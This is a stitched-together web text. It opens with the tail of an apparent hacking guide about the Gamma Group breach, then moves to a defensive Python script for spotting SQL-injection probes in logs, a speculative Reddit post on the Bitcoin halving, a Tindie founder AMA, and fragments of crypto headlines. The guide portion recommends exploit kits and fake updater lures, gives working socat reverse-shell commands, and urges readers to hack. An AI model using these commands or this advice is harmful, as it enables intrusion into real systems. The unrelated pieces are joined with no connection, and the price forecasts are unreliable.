1) Exploits in web browsers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browser/java/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt.
2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker.
-- 9 -- Resources
Links:
http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and:
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:tty,raw,echo=0 tcp-connect:localhost:PORTNUM
It's also useful for setting up weird pivots and all kinds of other stuff.
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc.
-- 10 -- Outro
You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action.
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
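The two print.php requests quoted in section 4 (`id=1 and 1=1` followed by `id=1 and 2=1`) leave a recognisable trace in web server logs. The following is an added example, not part of the original guide: a log check that flags any client sending both a true and a false numeric comparison in the same parameter, and records whether the server answered the two differently. The log lines, paths, addresses and function names are constructed for illustration.

```python
"""Flag paired boolean-based SQL injection probes in web access logs."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# A numeric comparison glued on with AND/OR, e.g. "1 and 1=1" or "3 OR 7=8".
PROBE_RE = re.compile(r'\b(?:and|or)\s+(\d+)\s*=\s*(\d+)\b', re.IGNORECASE)

# Constructed sample input (documentation address ranges, made-up paths).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2014:10:00:01 +0000] "GET /print.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2014:10:00:05 +0000] "GET /print.php?id=1%20and%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Aug/2014:10:00:09 +0000] "GET /print.php?id=1%20and%202=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Aug/2014:10:01:00 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Aug/2014:10:02:00 +0000] "GET /news.php?id=3+AND+7=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Aug/2014:10:02:03 +0000] "GET /news.php?id=3+AND+7=8 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.33 - - [01/Aug/2014:10:03:00 +0000] "GET /calc.php?expr=1+and+1=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def classify(value):
    """Return 'true', 'false' or None for one decoded parameter value."""
    m = PROBE_RE.search(value)
    if not m:
        return None
    return 'true' if int(m.group(1)) == int(m.group(2)) else 'false'


def find_probe_pairs(lines):
    """Return one finding per (client, path, parameter) that received both a
    true and a false comparison: the signature of a boolean-based test."""
    seen = defaultdict(lambda: {'true': set(), 'false': set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m['target'])
        # parse_qsl percent-decodes values and turns '+' into a space.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                key = (m['client'], url.path, name)
                seen[key][kind].add((m['status'], m['size']))

    findings = []
    for (client, path, param), kinds in sorted(seen.items()):
        if kinds['true'] and kinds['false']:
            findings.append({
                'client': client,
                'path': path,
                'param': param,
                # No shared (status, size) between the true and false probes
                # means the application behaved differently for each, so the
                # parameter likely reaches a query unsanitised: triage first.
                'response_differs': kinds['true'].isdisjoint(kinds['false']),
            })
    return findings


if __name__ == '__main__':
    for finding in find_probe_pairs(SAMPLE_LOG.splitlines()):
        print(finding)
```

A finding with `response_differs` set is the one to investigate first, since identical responses to both probes suggest the parameter was tested but did not act as an oracle.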
Hey everyone, Throwaway account btw. I’ve been deep in thought about the upcoming Bitcoin halving and wanted to share my views as well as seek alternate perspectives. I think BTC is now big enough to really have exposure to global events, and predict we are about to be in a wild ride. Even though my analysis is definitely bearish in the short term, really believe BTC is about to “grow up” after the turmoil of the next few weeks is over.
The tldr; to this is that I’m betting there will be a massively sharp downward drop in the price of BTC (ie sub USD$200) in the coming weeks with a longer term recovery highly likely, however the time it takes for this could vary from a fortnight to many months, and be driven by a new and higher transaction fee norm. I’ve been selling down my stake in the recent week given the high prices, as I am very confident a big opportunity is emerging to buy at the $150 level in the next few weeks and I’m building a war chest for it.
The detail
There’s of course no exact reason why the price of bitcoin has jumped so much in recent weeks, however I’ll assert it is a combination of the following;
Brexit -> and a rush to take money out of the European economy into safer places. Gold has risen, and so is BTC.
China -> the continued movement of funds out of the country
The Halving -> people see reduced supply as a reason to buy in
Speculators/observers -> they don’t want to miss out, so are jumping in and fueling the volumes/price upwards
On Brexit, we are a week away from knowing what happens. It seems that if Brexit occurs (eg Britain leaves the EU), it will be largely a big financial mistake for Britain spilling into the region (BTC might rise further, but it's already had a big run up already), and if Brexit fails (eg Britain stays), calm will return to the market and we will see a return from the recent flight to “safe assets”. It’s anyone’s guess what will happen here, and the bookies are predicting a close call. Verdict: either way Brexit goes, BTC fluctuates wildly, compounded by the ever-nearing halving event.
China – I’m really not close enough to the action here, however there has been a combination of local and global issues that are driving behavior. The Chinese love a gamble and I suspect, as other commentators do too, that this is a big factor on the BTC price too. Verdict: after Brexit, a Chinese rush from closing out their positions will accelerate the price drop.
The halving
I’m not a miner, but my back of the envelope calculations below are telling me we might be about to hit a “stalling event” if the price per BTC nears USD$500 before halving, which could drive panic in the market and cause a massive drop. To use round numbers for simplicity, here’s what the returns have been recently for miners:
January 2015 – price per BTC was ~$250 and decreasing. 25BTC reward provided $6,250 per block + ~0.1BTC in transaction fees. Hash rate was approx. 300GH/s. Total return = USD$6,275 per block.
July 2015 – price per BTC was ~ $250. 25BTC reward provided $6,250 per block + ~0.15BTC in transaction fees. Hash rate gradually increased approx. 350GH/s. Total return = USD$6287 per block.
January 2016 – price per BTC was ~$450. 25BTC reward provided $11,250 per block + ~0.2BTC transaction fees. Hash rate increased a bit over double to 800GH/s. Total return = USD$11,340 per block.
Now, June 2016 – price per BTC peaks at ~USD$750. 25BTC reward provides $18,750 per block + ~0.4BTC in transaction fees. Hash rate has almost doubled again to 1400GH/s. Total return = USD$19,050 per block.
Given the relative flat increase in hash rate when the price remained fairly flat in H1 2015, this tells me there is a baseline capacity of 300 or so GH/s which cannot operate if the return is less than $6,250 per block + transaction fees (as no-one was adding significant capacity then, perhaps just swapping out equipment). Based on all this, my calculations suggest the make or break price will be around USD$450 per BTC near the time of halving. Mining rewards would equal $5,625, and transaction fees sit around 0.5BTC per block, so total return per block comes to $5,850. Old miners get switched off as it is uneconomic for them to continue, and we lose approx. 300GH/s from the mining pool – approx. 20% overnight. Because the mining difficulty remains in place for a further ~2 weeks, transaction times take a hit given there is less capacity.
Panic hits the market driving the price down and transaction volumes up, creating a repeating cycle of a queue of transactions and slow confirmations, greater uncertainty and decreasing prices. People begin to think BTC is “done for” and panic even more, even though it is working exactly as designed. Less efficient miners continue to switch off as the price continues to drop. A few exchanges start having performance issues as they get smashed with web traffic – this actually helps the mining situation (less volume, transactions verified quicker), however given the panic the price doesn’t yet stabilize. People increase their transaction fees to prioritize their trades. We see transaction fees triple to an average around 1.5BTC per block (on 200 transactions it is still a small cost – approx. 0.0075BTC).
Panic (and robot trading) continues to drive the price of a BTC down, and it eventually finds a level of support, possibly between USD$200-$250 (range 12 months ago) but – worst case it drops through the floor and hits mid 2013 ranges. There may be no stopping the downward spiral until BIG buyers come back into the market. And there are plenty of them of course, with all the cash on the sidelines from those who sold out earlier, and big funds waiting to pounce on the post-halving correction which they have been hanging out for. Miners begin turning their old kit back on as BTC start to flow from the transaction fees and the price starts increasing, making it economic for them to work again.
Fast forward a few weeks, and the price of a BTC has jumped back up to more recent levels (USD$450-$500, maybe higher). The mining difficulty relaxes given the average transaction time went well over 10 minutes. Miners are making about $6,000 per block (12.5BTC), with transaction fees making up for the decrease in reward. A new norm appears. Survival stories from “the big halving” bring many, many more people in the market, fueling demand and the price follows. BTC lives on, but this time, stronger than before as it has finally grown up.
I’m reckoning USD$3000 in 2 years, but the next 4 weeks are going to be a testing time and probably best viewed from the sidelines until the price drops sufficiently to de-risk a purchase. Thoughts welcomed & appreciated – sorry I cannot reply but I’ll be keeping an eye on the thread.
[Table] IamA founder of Tindie, "Etsy for Tech". Started on /r/Arduino, team of 5, just finished fundraising (pitching 50+ investors), and have now closed $1m+ in funding. This is a follow up to last year's AMA, for anyone interested in startups/tech/Silicon Valley/open hardware. AMA!
Date: 2013-12-02
Great questions - as a maker, our rates are lower than Amazon - flat 5% of the order. We also reach a core audience of people like you, which tends to mean you'll sell more on Tindie vs Amazon. As an example, one seller sold exclusively on Amazon, opened a Tindie store, and we began outselling Amazon. He closed his Amazon store and now sells exclusively on Tindie.
As a buyer, you are joining a community of likeminded people from all over the world and in different niches. Some like audio, some drones, others lighting. In the new year we are launching more features to build out the community side of the site. We are a community marketplace - community comes first. We can do a better job on the community side, and those features are currently being built.
Sounds like you are now at the crossroad where people either keep going, or 'never have the time.' When I started, I'd get the occasional comment online, 'You'll never figure it out.' It's a pretty accurate statement for most. Most don't figure it out. If you can put your head down and just grit it out, you'll get to the other side.
If you want to grit it out, start with Learn Python the Hard Way. Then figure out a project you want to build and go build it. You'll pick things up as you go. You'll think you have it about 10 times before you really have a solid understanding. There were many times I'd talk to my friends and say "Oh I figured it out." I was wrong 10 times :)
It took 1 year to get to n00b level. The next year is when things settle in. After 2 years, you'll have a solid foundation to keep honing your skills. You won't know everything, but you can hack together projects, & figure things out.
Also checkout Stackoverflow. Learning how to properly break down my problems into questions was a great exercise. It helped me understand what the real problem is vs what I thought it was.
I did - my first job after learning how to code was as a developer advocate. Not 'coding' but putting what I learned to good use. That company was acquired, and I eventually became a web engineer at the company which acquired us. That was my last job before starting Tindie.
Good question - the only market validation I did was ask the question on /Arduino. There wasn't a marketplace for this type of hardware (we are still the only "big" site doing what we are doing). The space is emerging now.
You are right. The big question I got from investors is actually - 'How big is the market?' Unfortunately there isn't a good answer for that bc the market is growing / being defined now. Arduino/Raspberry Pi/Drones/3D printers are all just getting started and all growing like weeds. If those platforms become as big as we think they will, then a site like Tindie will have to emerge.
The one thing we look at is the components market is a massive, multibillion dollar market. The type of components that are on Tindie, generally speaking, first come to market on Tindie. The market potential is entirely untapped. However having orders from gov't agencies & large businesses is very reassuring that there is a much greater opportunity than just hobbyists (which is what most people think on first glance).
Biggest Challenge as CEO - Communication, balancing expectations, keeping everyone on the same page from users, employees to investors. You'll constantly hear, "Did you see X?" when someone thinks it is a competitor. Chances are it isn't and they have their own idea of what the business is which is different than your own.
Wisdom to start a startup - If it is a tech startup, one of your cofounders must be technical. Either yourself or your cofounder. If you can't build the first version/ a proof of concept yourself, start there. If you aren't technical, and don't know anyone technical, learn. In the valley you hear, "I'm looking for a technical cofounder." so many times it's crazy. You either already know someone (a good friend usually) or you don't. Trust me, you won't 'find' a technical cofounder.
Sure thing - if you hire a 3rd party, you will always have to pay someone else to iterate on the site. There is a 0% chance it will be right on the first shot. Therefore it's really an invitation to spend a lot of money down the road - not just the upfront cost you are spending to get your idea made. This is what I did with Knowble - it cost something like $20k+. Please learn from my mistake :) You'll have to iterate, make changes, learn as you go. If you know how to code, then you can make those changes yourself. You'll do it in the morning/nights/weekends and it will only cost you your time.
Very cool! Getting press / outside attention is very difficult (if you don't pay for PR - we don't pay for PR). Write blog posts, like to those sites. The link love will go a long way (over time). Most of the companies that you read about on TechCrunch, PandoDaily, etc are paying for PR which is why they get listed on all of those blogs and have stories come out at the same time (embargoes). As a student, build something! Just keep building things. You have some free time - take full advantage of it. Also meet your peers. Build a network of other students in your class. Some will go to Google, Twitter, the next Google, the next Twitter. Increase your chances of doing well by meeting as many super smart people as you can. Build projects with them. Just make things and learn from experience.
The site was already live, we had products, orders, traffic. The sales early on were ~doubling month over month. Sure they were small but that seems like a very good sign. As it kept growing, people around me connected me with other people interested in the space. The first investor I got was someone that was in my network already, but I didn't know him. He also invests in early stage companies, understands marketplaces, and believes in the changes we are seeing in the hardware space. From introductory call to email saying, "I'd like to invest" was about 12 - 18 hours.
We didn't have to iterate on the site, but I did iterate on the messaging/how I frame what we are doing depending upon the investor, and how that message was received by the last investor. I was constantly iterating what I said from pitch to pitch.
Definitely - 100% worthwhile. I had saved up enough to live for a year without a paycheck (without healthcare...not smart but I did it). If you are interested, go for it. While you still have a job start learning HTML, CSS, some basic things. Give yourself some sort of foundation before taking the plunge. After a year you won't be able to get a job as an engineer, but it will definitely help in the long run. I have never regretted that decision.
AirPi - Two 17yr olds in London built a shield for Raspberry Pi to turn it into a weather station. Brilliant, cheap product that I never saw coming and has done amazingly. They had to incorporate in the UK, take a loan from their parents, and just shipped hundreds of preorders they got on Tindie. The only thing I know for certain is we will have tens of thousands of hardware companies emerge over the next few years because it is becoming cheaper to prototype and easier to manufacture in lower volumes. Yes "hardware is hard" but it is getting easier and that only opens the door for more people to come in.
Tapster - a robot for manual app testing on mobile devices. EVERY mobile app developer in the world should have one bc of the time you'll save.
Good question - you'll need to figure out where your initial users are and tell them what you are doing. Get people in your corner. As you build the site, give them updates, let them sign up before the site is live. If you don't have enough users on day 1, do more to drive more users to the site. Launch only when you have some amount of users (few hundred or maybe a few thousand is the best case scenario). You'll never be ready to launch but definitely give yourself some momentum before opening the doors.
I did this by keeping everyone on /Arduino in the loop. As I found a name, a domain, logo, I'd share those updates. Sellers were able to sign up and "stock the shelves" prior to launch which meant once I opened the site for transactions, we had ~20 sellers/ products on the site and orders on day 1.
Not right now. Bitcoin is too volatile. From talking with other marketplaces that implemented Bitcoin, the % of transactions that come through are very, very small. Most people seem to be holding Bitcoins as an investment strategy (the gold analogy). I think that is true. At this point, we can get a much bigger bang for our engineering buck by working on other features vs implementing/maintaining Bitcoin or a similar digital currency.
I had been in SF for 4 years, then moved to Portland after the last company I was at was acquired. I moved back bc missed friends and our head of engineering is in Mountain View too. Made sense from a personal perspective.
Would I move to the valley if I didn't already have a connection to the area? I'm not sure. It is definitely cheaper to live somewhere else. However it is more difficult to get into the community from outside the area. If you live in the valley, you'll constantly hear about startups/tech and meet people who are part of the scene. It's easier to be a part of the conversation if you are in the area.
Very true. It is very common for people to stay at a job for one year, vest 25% of your options, and leave for the next hot startup. It is valuable to have a presence in the valley - but not necessary for your team to all be there. I'm a huge fan of distributed businesses.
Hey Chris! I think it will gain in complexity - esp as parts come down in price, and manufacturing lower quantities becomes more accessible. The opportunities only get magnified as those two trends accelerate.
I think we will always have low level / low end products, but the sky is the limit - in terms of price point and customers. We already have products that cost pennies to $1k+. We will begin to have more consumerish products - but I think those will fuel growth in hardware. The more interesting products emerge, the more interested people will jump into diy. Very cyclical. Arduino & Raspberry Pi just make that first step so much easier. Gateway hardware drugs.
It is difficult but not impossible. Things to plan for: taxes & attorney fees. You'll want to set up your business correctly if you plan on raising outside investment. If you don't do that right up front, you'll get bit when you fundraise. The legal fees we'll have for this financing round will be over $10k I bet (probably more)
Google is your best friend. There are books, tutorials, but just dive in. If you have some coding background just get started. Fortunately that is where I started so it's more a process of picking something up and playing around (vs starting from 0).
Thanks! At this point it is just closing and collecting checks so the final % will be set in a few weeks once we have a definitive amount closed with this round. However the answer you are looking for is 20%-25%.
At this time last year, I forget where we were with users but we had $3600 in sales that month which would be about 100 orders. When talking to early stage investors, it is very much a gamble. The chance of failure much higher, but then again the opportunity is great. I haven't asked them point blank, but I think it ultimately boils down to they have an idea of how the world will work in the future, and you fit in that narrative.
We don't right now and don't have any plans to in the future. Copying answer from another question "Bitcoin is too volatile. From talking with other marketplaces that implemented Bitcoin, the % of transactions that come through are very, very small. Most people seem to be holding Bitcoins as an investment strategy (the gold analogy). I think that is true. At this point, we can get a much bigger bang for our engineering buck by working on other features vs implementing/maintaining Bitcoin or a similar digital currency."
Good question - once you are ready, you can list it as a Fundraiser (our version of crowdfunding which really is just accepting preorders). It has to hit the min # of units sold to 'live' where we bill the orders and you fulfill those ordered. That will give you a good idea of the initial demand. Shipping & handling you'll need to do a little testing on your end bc it depends where you are located & the shipping service you select. Refunds we can handle on our end. You'll just need to tell us which orders to refund. If you have any other questions, feel free to email us at support(at) tindie.com. More than happy to help!
100% from networking. Friend introducing me to someone else, who says you should talk to X. That person sends the intro, and then schedule a meeting. Cold emails don't get you very far with the top investors who are constantly being bombarded with pitches.
Depends ultimately on the investor and if they are the lead or a follow on investor. The lead must believe in the space, have some idea of what is going, and therefore be passionate about the opportunity.
Follow on investors might know something about the space, might not. The one thing I didn't realize is how much they just "pile on." Most investors look for a signal by another big name investor, and if they are investing, looks good and they want in! The pile on mentality is alive and well.
Build it first. If you get traction on the idea/project, investors will be interested. If it is just an idea, you'll have a very tough time. The only real answer - build it and they will come (if it is a great project and they see potential).
I think any hardware product today should have an open equivalent. The opportunity is just sitting there for someone to build an open version of X. Open source is a flywheel. Once you get it started and there is a community to support it, it only becomes stronger and better. At the end of the day, I don't see much difference btwn producer vs educator. If you have an open project, part of your job will be education. Just start working on something. At the end of the day, if you want to produce it and sell it you can. If not, no harm/no foul.
Good question - some investors you won't get along with. You'll have different ideas/ look at the world differently/ it just isn't a fit. If that is the case, probably not a good fit as a major investor in your company. They can email you rather frequently - don't want to hate that part of your job...
Unfortunately not. Get more experienced & become a solid JS developer. Build projects, open the code, get feedback, critiqued by the JS community. You'll have a lot of value as a seasoned JS dev (esp as Node picks up traction)
I'm anti-patent. It is a huge time/money suck and ultimately hinders innovation. I'm not the best person to ask on researching your design/idea/ etc but I'd probably just go ahead build it and go for it. Any time you spend looking for conflicting patents, someone else will launch their version and get a leg up.
We can definitely do a better job on that end. Since you all have an engineering background, most likely the biggest problem will come in execution - sourcing manufacturers, parts, work abroad vs a domestic manufacturer. PM me and we can definitely help!
Bitcoin hashrate jumped 23 percent since May 26, signaling more miners are resuming operations on the cryptocurrency’s blockchain network. The rally also continued as Bitcoin’s mining difficulty dropped by over 9 percent on June 4. The rising hashrate indicates a slowdown in miner capitulation, which could assist in sending the bitcoin price higher towards $10,000. The Bitcoin hashrate […]
Bitcoin tweeted out to its 58 thousand plus followers that their hashrate has hit another all-time high, experiencing a 15% increase in the last two weeks. Bitcoin Hashrate Constantly Climbing: This recent jump and constant rise in hashrate over the past few months shows a consistent level of interest in mining the digital token, despite […]
Bitcoin is in a bull market and is not having a bear market rally. Next stop is $11,000. Two things are driving this: 1) Coronavirus. Bitcoin (BTC) is flight/safe haven capital and the global fear of this...
Morgan Stanley Strategist Recommends Bitcoin as Central Banks… September 13, 2020. Bitcoin.
Bitcoin whale cluster at $10,570 is the most… September 12, 2020. Bitcoin.
Huge ‘Bitcoin Tram’ Ad Campaign and 20 Billboards… September 12, 2020. Bitcoin.
Bullish pennant hints at Bitcoin price breakout to… September 12, 2020. Bitcoin.
Growing Bitcoin Hashrate Points to Further BTC Gains ...
Meanwhile, others are putting the blame on technological metrics, like hash rate, which refers to the speed of a bitcoin miner's performance. Joe DiPasquale, CEO of Bitbull Capital, believes that ...
Bitcoin HASH RATE skyrockets! Cryptocurrency Bucks the Trend!! Oobit Pass Crypto and Bitcoin News
Bitcoin is a 'Screaming Buy' https://www.ccn.com/crypto-bull-like-amazon-stock-bitcoin-is-a-screaming-buy/ #Bitcoin Hash Rate to Hit a Whopping 100 Quintilli...
Bitcoin's halving (block reward) is fast approaching, and we examine the recently increased hash rate metrics.
Oobit Releases A Coinbase-Powered “Skyscanner” For Bitcoin. Singapore-based Oobit ...
BITCOIN parabolic runs always begin with the most important bitcoin fundamental going parabolic first. This fundamental is the Bitcoin HASH RATE, and it has been going ballistic over the past year.
Well, Litecoin hash rate is down and people are going crazy about it. My thoughts on LTC and LTC hash rate. Cycles of Bitcoin - https://www.tradingview.com ...
We also look at why the hash rate has dropped by 30%, why Bitcoin is still Gold 2.0, and how we can profit from it. Enjoy!